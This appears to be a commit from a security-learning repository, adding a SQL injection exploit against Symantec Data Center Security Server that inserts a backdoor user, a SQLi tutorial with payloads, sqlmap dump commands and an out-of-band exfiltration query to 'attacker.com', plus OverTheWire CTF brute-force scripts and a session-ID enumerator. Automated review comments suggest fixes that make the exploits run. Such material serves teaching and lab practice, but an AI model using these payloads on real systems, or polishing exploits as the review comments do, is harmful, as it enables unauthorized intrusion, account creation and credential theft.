docs: Clean up resources for Hackoctoberfest 2019 (#41)

* Clean up resources for Hackoctoberfest 2019

* 👩🏾‍🦱 Add cloud hacking readme
Mia von Steinkirch 2019-10-29 18:41:32 -07:00 committed by GitHub
parent 746d808fc0
commit 9ed0254149
458 changed files with 9658 additions and 57 deletions


@ -0,0 +1,43 @@
#!/usr/bin/env python
# Reference: http://seclists.org/fulldisclosure/2015/Jan/91
import httplib
def send_request(host,data):
params = data
headers = {"AppFire-Format-Version": "1.0",
"AppFire-Charset": "UTF-16LE",
"Content-Type":"application/x-appfire",
"User-Agent":"Java/1.7.0_45",
}
conn = httplib.HTTPSConnection(host)
conn.request("POST", "/sis-ui/authenticate", params, headers)
response = conn.getresponse()
data=response.read()
conn.close()
return response,data
if __name__ = '__main__'
header ="Data-Format=text/plain\nData-Type=properties\nData-Length=%i\n\n"
data ="ai=2\r\nha=example.com\r\nun=AAAAAAAAAAAAAA'; INSERT INTO USR (RID, USERNAME,
PWD, CONTACT_NAME, PHONES, EMAIL, ALERT_EMAIL, ADDRESS, MANAGER_NAME, BUSINESS_INFO,
PREF_LANGUAGE, FLAGS, DESCR, CREATETIME, MODTIME, ENABLED, BUILTIN, HIDDEN, SALT)
VALUES (1504, 'secconsult', 'DUjDkNZgv9ys9/Sj/FQwYmP29JBtGy6ZvuZn2kAZxXc=', '', '',
'', '', '', '', '', '', NULL, 'SV DESCRIPTION', '2014-09-12 07:13:09', '2014-09-12
07:13:23', '1', '0', '0',
'N1DSNcDdDb89eCIURLriEO2L/RwZXlRuWxyQ5pyGR/tfWt8wIrhSOipth8Fd/KWdsGierOx809rICjqrhiNqPGYTFyZ1Kuq32sNKcH4wxx+AGAUaWCtdII7ZXjOQafDaObASud25867mmEuxIa03cezJ0GC3AnwVNOErhqwTtto=');
-- '' " # add user to USR table
#data ="ai=2\r\nha=example.com\r\nun=AAAAAAAAAAAAAA'; INSERT INTO ROLEMAP (USERRID,
ROLERID) VALUES (1504, 1); -- " # add user to admin group
data+="\r\nan=Symantec Data Center Security Server
6.0\r\npwd=GBgYGBgYGBgYGBgYGBgYGBg=\r\nav=6.0.0.380\r\nhn=WIN-3EJQK7U0S3R\r\nsso=\r\n"
data = data.encode('utf-16le')
eof_flag="\nEOF_FLAG\n"
header = header %(len(data))
payload=header+data+eof_flag
response,data = send_request("<host>:4443",payload)
print data.decode('utf-16le')
print response.status
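Review bot: The entry-point guard on the `if __name__ = '__main__'` line is a syntax error (a single `=` and no trailing colon), so the script cannot be run at all as committed; it should read `if __name__ == '__main__':`. The payload literal that begins `data ="ai=2\r\nha=example.com...` appears to span several lines without triple quotes, which is also invalid unless that is only display wrapping in this view — worth checking in the raw file. The target `"<host>:4443"` is a hard-coded placeholder with no argument parsing, and `httplib.HTTPSConnection` presumably verifies the server certificate on Python 2.7.9+, so a self-signed appliance certificate would fail before the request is sent; a header comment stating the intended Python version, the expected target, and that this is for authorized testing only would help the next reader.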

Web_Hacking/SQLi/README.md Normal file

@ -0,0 +1,212 @@
# SQL Injections (SQLi)
![](http://i.imgur.com/AcVJKT2.png)
* SQL works by building query statements, these statements are intended to be readbale and intuitive.
* A SQL query search can be easily manipulated and assume that a SQL query search is a reliable command. This means that SQL searches are capable of passing, unnoticed, by access control mechanisms.
* Using methods of diverting standard authentication and by checking the authorization credentials, you can gain access to important information stored in a database.
* Exploitation:
- Dumping contents from the database.
- Inserting new data.
- Modifying existing data.
- Writing to disk.
## The Simplest Example
A parameter passed for a name of a user:
```
SELECT * FROM users WHERE
name="$name";
```
In this case, the attacker just needs to introduce a true logical expression like ```1=1```:
```
SELECT * FROM users WHERE 1=1;
```
So that the **WHERE** clause is always executed, which means that it will return the values that match to all users.
Nowadays it is estimated that less than 5% of the websites have this vulnerability.
These types of flaws facilitate the occurrence of other attacks, such as XSS or buffer overflows.
## Blind SQL Injection
* INFERENCE: useful technique when data not returned and/or detailed error messages disabled. We can differentiate between two states based on some attribute of the page response.
* It's estimated that over 20% of the websites have this flow.
* In traditional SQLi it is possible to reveal the information by the attacker writing a payload. In the blind SQLi, the attacker needs to ask the server if something is TRUE or FALSE. For example, you can ask for a user. If the user exists, it will load the website, so it's true.
* Timing-based techniques: infer based on delaying database queries (sleep(), waitfor delay, etc).
```
IF SYSTEM_USER="john" WAIFOR DELAY '0:0:15'
```
* Response-based techniques (True or False): infer based on text in response. Examples:
```
SELECT count (*) FROM reviews WHERE author='bob' (true)
SELECT count (*) FROM reviews WHERE author='bob' and '1'='1' (true)
SELECT count (*) FROM reviews WHERE author='bob' and '1'='2' (false)
SELECT count (*) FROM reviews WHERE author='bob' and SYSTEM_USER='john' (false)
SELECT count (*) FROM reviews WHERE author='bob' and SUBSTRING(SYSTEM_USER,1,1)='a' (false)
SELECT count (*) FROM reviews WHERE author='bob' and SUBSTRING(SYSTEM_USER,1,1)='c' (true)
```
(and continue to iterate until finding the value of SYSTEM_USER).
* Utilize transport outside of HTTP response.
```
SELECT * FROM reviews WHERE review_author=UTL_INADDR.GET_HOST_ADDRESS((select user from dual ||'.attacker.com'));
INSERT into openowset('sqloledb','Network=DBMSSOCN; Address=10.0.0.2,1088;uid=gds574;pwd=XXX','SELECT * from tableresults') Select name,uid,isntuser from master.dbo.sysusers--
```
### Common ways of Exploitation
* Every time you see an URL, the **question mark** followed by some type of letter or word means that a value is being sent from a page to another.
* In the example
```
http://www.website.com/info.php?id=10
```
the page *info.php* is receiving the data and will have some code like:
```
$id=$_post['id'];
```
and an associated SQL query:
```
QueryHere = "select * from information where code='$id'"
```
#### Checking for vulnerability
We can start to verifying whether the target is vulnerable by attaching a simple quote symbol ```'``` in the end of the URL:
```
http://www.website.com/info.php?id=10'
```
If the website returns the following error:
You have an error in your SQL syntax...
It means that this website is vulnerable to SQL.
#### Find the structure of the database
To find the number of columns and tables in a database we can use [Python's SQLmap](http://sqlmap.org/).
This application streamlines the SQL injection process by automating the detection and exploitation of SQL injection flaws of a database. There are several automated mechanisms to find the database name, table names, and number of columns.
* ORDER BY: it tries to order all columns form x to infinity. The iteration stops when the response shows that the input column x does not exist, reveling the value of x.
* UNION: it gathers several data located in different table columns. The automated process tries to gather all information contained in columns/table x,y,z obtained by ORDER BY. The payload is similar to:
```
?id=5'%22union%22all%22select%221,2,3
```
* Normally the databases are defined with names such as: user, admin, member, password, passwd, pwd, user_name. The injector uses a trial and error technique to try to identify the name:
```
?id=5'%22union%22all%22select%221,2,3%22from%22admin
```
So, for example, to find the database name, we run the *sqlmap* script with target *-u* and enumeration options *--dbs* (enumerate DBMS databases):
```
$ ./sqlmap.py -u <WEBSITE> --dbs
(...)
[12:59:20] [INFO] testing if URI parameter '#1*' is dynamic
[12:59:22] [INFO] confirming that URI parameter '#1*' is dynamic
[12:59:23] [WARNING] URI parameter '#1*' does not appear dynamic
[12:59:25] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[12:59:25] [INFO] testing for SQL injection on URI parameter '#1*'
[12:59:25] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:59:27] [WARNING] reflective value(s) found and filtering out
[12:59:51] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[13:00:05] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[13:00:16] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
(...)
```
#### Gaining access to the Database
* From this we can verify what databases we have available, for example. From this we can find out how many tables exist, and their respective names. The sqlmap command is:
```
./sqlmap -u <WEBSITE> --tables <DATABASE-NAME>
```
* The main objective is to find usernames and passwords in order to gain access/login to the site, for example in a table named *users*. The sqlmap command is
```
./sqlmap -u <WEBSITE> --columns -D <DATABASE-NAME> -T <TABLE-NAME>
```
This will return information about the columns in the given table.
* Now we can dump all the data of all columns using the flag ```-C``` for column names:
```
./sqlmap -u <WEBSITE> --columns -D <DATABASE-NAME> -T <TABLE-NAME> -C 'id,name,password,login,email' --dump
```
If the password are clear text (not hashed in md5, etc), we have access to the website.
## Basic SQL Injection Exploit Steps
1. Fingerprint database server.
2. Get an initial working exploit. Examples of payloads:
- '
- '--
- ')--
- '))--
- or '1'='1'
- or '1'='1
- 1--
3. Extract data through UNION statements:
- NULL: use as a column place holder helps with data type conversion errors
- GROUP BY - help determine number of columns
4. Enumerate database schema.
5. Dump application data.
6. Escalate privilege and pwn the OS.
## Some Protection Tips
* Never connect to a database as a super user or as a root.
* Sanitize any user input. PHP has several functions that validate functions such as:
- is_numeric()
- ctype_digit()
- settype()
- addslahes()
- str_replace()
* Add quotes ```"``` to all non-numeric input values that will be passed to the database by using escape chars functions:
- mysql_real_escape_string()
- sqlit_escape_string()
```php
$name = 'John';
$name = mysql_real_escape_string($name);
$SQL = "SELECT * FROM users WHERE username='$name'";
```
* Always perform a parse of data that is received from the user (POST and FORM methods).
- The chars to be checked:```", ', whitespace, ;, =, <, >, !, --, #, //```.
- The reserved words: SELECT, INSERT, UPDATE, DELETE, JOIN, WHERE, LEFT, INNER, NOT, IN, LIKE, TRUNCATE, DROP, CREATE, ALTER, DELIMITER.
* Do not display explicit error messages that show the request or a part of the SQL request. They can help fingerprint the RDBMS(MSSQL, MySQL).
* Erase user accounts that are not used (and default accounts).
* Other tools: blacklists, AMNESIA, Java Static Tainting, Codeigniter.


@ -0,0 +1,44 @@
#!/usr/bin/python
__author__ = "bt3"
import requests
import string
def brute_force_password(LENGTH, AUTH, CHARS, SQL_URL1, SQL_URL2, KEYWORD):
password = ''
for i in range(1, LENGTH+1):
for j in range (len(CHARS)):
r = requests.get( ( SQL_URL1 + str(i) + SQL_URL2 + CHARS[j] ), auth=AUTH)
print r.url
if KEYWORD in r.text:
password += CHARS[j]
print("Password so far: " + password)
break
return password
if __name__ == '__main__':
# authorization: login and password
AUTH = ('natas15', 'AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J')
# BASE64 password and 32 bytes
CHARS = string.ascii_letters + string.digits
LENGTH = 32
# crafted url option
SQL_URL1 = 'http://natas15.natas.labs.overthewire.org?username=natas16" AND SUBSTRING(password,'
SQL_URL2 = ',1) LIKE BINARY "'
KEYWORD = 'exists'
print(brute_force_password(LENGTH, AUTH, CHARS, SQL_URL1, SQL_URL2, KEYWORD))
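Review bot: When no character in `CHARS` produces `KEYWORD` at position `i` (a transient error, a rate limit, or a character outside the alphabet), the inner loop at `for j in range (len(CHARS)):` falls through and the outer loop silently moves on to position `i+1`, so the recovered password is shortened and shifted with no warning. A `for`/`else` on the inner loop, e.g. `else: raise RuntimeError('no match at position %d' % i)`, makes that failure visible. The `requests.get(...)` call has no `timeout=`, so one hung connection stalls the whole run. The credential on the `AUTH = (...)` line is public CTF data, but a one-line comment saying so would stop it reading as a committed secret.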


@ -0,0 +1,45 @@
#!/usr/bin/python
__author__ = "bt3"
import requests
import string
def brute_force_password(LENGTH, AUTH, CHARS, SQL_URL1, SQL_URL2):
password = ''
for i in range(1, LENGTH+1):
for j in range (len(CHARS)):
r = requests.get( ( SQL_URL1 + str(i) + SQL_URL2 + CHARS[j] + SQL_URL3 ), auth=AUTH)
time = r.elapsed.total_seconds()
print("Position %d: trying %s... Time: %.3f" %(i, CHARS[j], time))
#print r.url
if time >= 9:
password += CHARS[j]
print("Password so far: " + password)
break
return password
if __name__ == '__main__':
# authorization: login and password
AUTH = ('natas17', '8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw')
# BASE64 password and 32 bytes
CHARS = string.ascii_letters + string.digits
LENGTH = 32
# crafted url option 1
SQL_URL1 = 'http://natas17.natas.labs.overthewire.org?username=natas18" AND SUBSTRING(password,'
SQL_URL2 = ',1) LIKE BINARY "'
SQL_URL3 = '" AND SLEEP(10) AND "1"="1'
print(brute_force_password(LENGTH, AUTH, CHARS, SQL_URL1, SQL_URL2))
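Review bot: `SQL_URL3` is used inside `brute_force_password` on the `r = requests.get(...)` line but is not one of its parameters, so the function only works because the `__main__` block happens to define a module-level global of that name; calling it from anywhere else fails with `NameError`. Add it to the signature, `def brute_force_password(LENGTH, AUTH, CHARS, SQL_URL1, SQL_URL2, SQL_URL3):`, and pass it at the call site, `print(brute_force_password(LENGTH, AUTH, CHARS, SQL_URL1, SQL_URL2, SQL_URL3))`. The fixed `if time >= 9:` threshold accepts any slow response as a hit, so a single laggy request on a non-matching character corrupts the result; measuring a baseline request first and comparing against baseline plus the `SLEEP(10)` delay is more robust. As with the sibling script, an inner-loop `else:` that aborts when no character matches at a position would stop silent truncation of the password.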


@ -0,0 +1,45 @@
#!/usr/bin/python
__author__ = "bt3"
import requests
def brute_force_password(URL, PAYLOAD, MAXID):
for i in range(MAXID):
#HEADER ={'Cookie':'PHPSESSID=' + (str(i) + '-admin').encode('hex')}
r = requests.post(URL, params=PAYLOAD)
print(i)
print r.text
id_hex = requests.utils.dict_from_cookiejar(r.cookies)['PHPSESSID']
print(id_hex.decode('hex'))
if __name__ == '__main__':
#AUTH = ('admin', 'password')
URL = 'http://10.13.37.12/cms/admin/login.php'
PAYLOAD = ({'debug': '1', 'username': 'admin', 'password': 'pass'})
MAXID = 640
brute_force_password(URL, PAYLOAD, MAXID)
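Review bot: The loop in `brute_force_password` never uses `i` in the request: the `HEADER` line that builds the candidate `PHPSESSID` cookie is commented out and `requests.post(URL, params=PAYLOAD)` sends the identical request `MAXID` times, so nothing is actually enumerated. Restore it and send it, `HEADER = {'Cookie': 'PHPSESSID=' + (str(i) + '-admin').encode('hex')}` followed by `r = requests.post(URL, params=PAYLOAD, headers=HEADER)`. `dict_from_cookiejar(r.cookies)['PHPSESSID']` raises `KeyError` on any response that sets no cookie, so use `.get('PHPSESSID')` and skip when absent. Note that `params=` puts `username`/`password` in the query string rather than the form body; if `login.php` reads `$_POST`, `data=` is probably what was intended — cannot be confirmed from here. `.encode('hex')`/`.decode('hex')` are Python 2 only, which the shebang implies but a comment should state.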